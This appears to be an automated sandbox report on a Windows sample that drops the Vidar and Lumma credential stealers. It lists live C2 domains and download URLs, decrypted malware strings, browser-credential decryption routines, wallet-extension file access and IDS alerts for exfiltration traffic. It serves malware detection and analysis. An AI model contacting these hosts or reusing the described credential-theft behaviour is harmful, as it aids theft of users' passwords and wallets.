http://lade.petperfectcare.com/msvcp140.dll	true		unknown
http://lade.petperfectcare.com/freebl3.dll	true		unknown
http://lade.petperfectcare.com/softokn3.dll	true		unknown
bemuzzeki.sbs	true		unknown
exemplarou.sbs	true		unknown
http://lade.petperfectcare.com/vcruntime140.dll	true		unknown
wickedneatr.sbs	true		unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: f1r6P3j3g7.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://steamcommunity.com/profiles/76561199780418869	URL Reputation: Label: malware
Source: https://t.me/ae5ed	URL Reputation: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\a43486128347[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1310458
Source: C:\ProgramData\KEGIDHJKKJ.exe	Avira: detection malicious, Label: HEUR/AGEN.1310458

Found malware configuration

Source: 00000000.00000002.1815003832.000000000091D000.00000004.00000001.01000000.00000003.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "e694b6d50199ea44207a97e25dda5506"}
Source: 10.2.KEGIDHJKKJ.exe.d00000.0.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["isoplethui.sbs", "frizzettei.sbs", "laddyirekyi.sbs", "invinjurhey.sbs", "bemuzzeki.sbs", "exilepolsiy.sbs", "exemplarou.sbs", "wickedneatr.sbs"], "Build id": "H8NgCl--"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\a43486128347[1].exe	Joe Sandbox ML: detected
Source: C:\ProgramData\KEGIDHJKKJ.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: f1r6P3j3g7.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: wickedneatr.sbs
Source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: invinjurhey.sbs
Source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: laddyirekyi.sbs
Source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: exilepolsiy.sbs
Source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: bemuzzeki.sbs
Source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: exemplarou.sbs
Source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: isoplethui.sbs
Source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: frizzettei.sbs
Source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: exemplarou.sbs
Source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: TeslaBrowser/5.5
Source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: - Screen Resoluton:
Source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: - Physical Installed Memory:
Source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: Workgroup: -
Source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: H8NgCl--

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_004080A1 CryptUnprotectData,LocalAlloc,LocalFree,	3_2_004080A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00408048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	3_2_00408048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00411E5D CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	3_2_00411E5D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0040A7D8 _memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcatA,PK11_FreeSlot,lstrcatA,	3_2_0040A7D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBB6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	3_2_6CBB6C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD0A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	3_2_6CD0A9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD044C0 PK11_PubEncrypt,	3_2_6CD044C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD04440 PK11_PrivDecrypt,	3_2_6CD04440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCD4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	3_2_6CCD4420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD525B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	3_2_6CD525B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCEE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	3_2_6CCEE6E0

Uses 32bit PE files

Source: f1r6P3j3g7.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:53640 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:53641 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:53645 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:53658 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:53878 version: TLS 1.2

Source: f1r6P3j3g7.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: mozglue.pdbP source: MSBuild.exe, 00000003.00000002.2215872054.000000006CC1D000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
Source:	Binary string: freebl3.pdb source: MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.3.dr, freebl3.dll.3.dr
Source:	Binary string: freebl3.pdbp source: MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.3.dr, freebl3.dll.3.dr
Source:	Binary string: nss3.pdb@ source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2216736775.000000006CDDF000.00000002.00000001.01000000.00000008.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
Source:	Binary string: softokn3.pdb@ source: MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: MSBuild.exe, 00000003.00000002.2206196527.00000000359F7000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.3.dr, vcruntime140[1].dll.3.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSBuild.exe, 00000003.00000002.2195422275.0000000029B1F000.00000004.00000020.00020000.00000000.sdmp, msvcp140[1].dll.3.dr, msvcp140.dll.3.dr
Source:	Binary string: nss3.pdb source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2216736775.000000006CDDF000.00000002.00000001.01000000.00000008.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000003.00000002.2188334059.000000001D668000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2182419932.00000000176F7000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.3.dr
Source:	Binary string: mozglue.pdb source: MSBuild.exe, 00000003.00000002.2215872054.000000006CC1D000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
Source:	Binary string: softokn3.pdb source: MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr

Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_00909ABF FindFirstFileExW,	0_2_00909ABF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	3_2_0041543D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,	3_2_00414CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_00409D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_0040D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040B5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	3_2_0040BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_00415FD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_0040B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	3_2_00415B0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	3_2_0040CD37
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D19ABF FindFirstFileExW,	10_2_00D19ABF

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 3_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

3_2_00415142

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 4x nop then mov eax, dword ptr fs:[00000030h]	0_2_0091E385
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 4x nop then mov dword ptr [ebp-04h], eax	0_2_0091E385
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr fs:[00000030h]	3_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov dword ptr [ebp-04h], eax	3_2_004014AD
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp+0Ch]	10_2_00D5A0B9
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then movzx ebx, word ptr [ecx]	10_2_00D58051
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	10_2_00D482E8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 7789B0CBh	10_2_00D743F8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov word ptr [eax], cx	10_2_00D4A3BF
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	10_2_00D6E318
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then movzx ecx, word ptr [edi+eax]	10_2_00D745E8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	10_2_00D68528
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	10_2_00D5A687
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov word ptr [eax], cx	10_2_00D5665F
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, ebx	10_2_00D4264D
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp]	10_2_00D72601
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 62429966h	10_2_00D707F8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], F8FD61B8h	10_2_00D4C89C
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh	10_2_00D768A8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then jmp dword ptr [0044FDB4h]	10_2_00D42849
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	10_2_00D4A86A
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov byte ptr [edi], al	10_2_00D60813
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then jmp eax	10_2_00D3E9A5
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then jmp eax	10_2_00D3E914
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esi+30h]	10_2_00D6093D
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	10_2_00D32928
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	10_2_00D54AD8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp+40h]	10_2_00D3EAC6
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp+000006B8h]	10_2_00D4AA47
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh	10_2_00D76A38
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp]	10_2_00D76BB8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 9ECF05EBh	10_2_00D76BB8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov byte ptr [edi], al	10_2_00D60B43
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	10_2_00D3CB78
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], A70A987Fh	10_2_00D6CB36
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov byte ptr [edi], al	10_2_00D60B22
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	10_2_00D5AC81
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then movzx ecx, word ptr [ebp+00h]	10_2_00D38D88
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp]	10_2_00D52D48
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp+40h]	10_2_00D3ED6B
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov word ptr [eax], cx	10_2_00D54D38
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then jmp eax	10_2_00D56EC4
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], F3285E74h	10_2_00D74E98
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp]	10_2_00D74E98
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov word ptr [edx], 0000h	10_2_00D4CEB7
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then jmp ecx	10_2_00D72EAE
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp]	10_2_00D6CE48
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	10_2_00D40F6F
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then jmp ecx	10_2_00D72F6C
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esi+30h]	10_2_00D60F18
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esi+14h]	10_2_00D60F18
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h	10_2_00D70F18
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov dword ptr [esp+1Ch], 5E46585Eh	10_2_00D5CF30
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov ebp, eax	10_2_00D371D8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov word ptr [eax], dx	10_2_00D4F138
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov word ptr [esi], ax	10_2_00D4F138
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], C274D4CAh	10_2_00D73290
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esi+30h]	10_2_00D5F2B8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], C274D4CAh	10_2_00D73390
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp+0Ch]	10_2_00D593AF
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	10_2_00D4340E
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov word ptr [eax], dx	10_2_00D4F540
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	10_2_00D5B56A
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	10_2_00D736C7
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	10_2_00D31878
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 27BAF212h	10_2_00D73833
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], F3285E74h	10_2_00D55824
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h	10_2_00D71918
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	10_2_00D5DA58
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h	10_2_00D59BA8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp]	10_2_00D59BA8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], C85F7986h	10_2_00D59BA8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then jmp eax	10_2_00D57B48
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov word ptr [edx], ax	10_2_00D57B69
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then cmp word ptr [eax+esi+02h], 0000h	10_2_00D5BB20
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then cmp byte ptr [ebx], 00000000h	10_2_00D43CBA
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp]	10_2_00D75C62
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then jmp eax	10_2_00D55C1B
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	10_2_00D3DDC4
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	10_2_00D33D78
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov edi, ecx	10_2_00D41D02
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov ecx, dword ptr [edx]	10_2_00D2DED8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	10_2_00D43E69
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esi+30h]	10_2_00D5FFD5
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp]	10_2_00D39FE8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp]	10_2_00D39FE8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then jmp ecx	10_2_00D35FB0
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esi+30h]	10_2_00D5FF74
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then dec ebx	10_2_00D6BF08

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.4:49742 -> 95.164.90.97:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 95.164.90.97:80 -> 192.168.2.4:49742
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 95.164.90.97:80 -> 192.168.2.4:49742
Source: Network traffic	Suricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.4:53642 -> 45.132.206.251:80
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:53641 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:53641 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:53640 -> 188.114.96.3:443
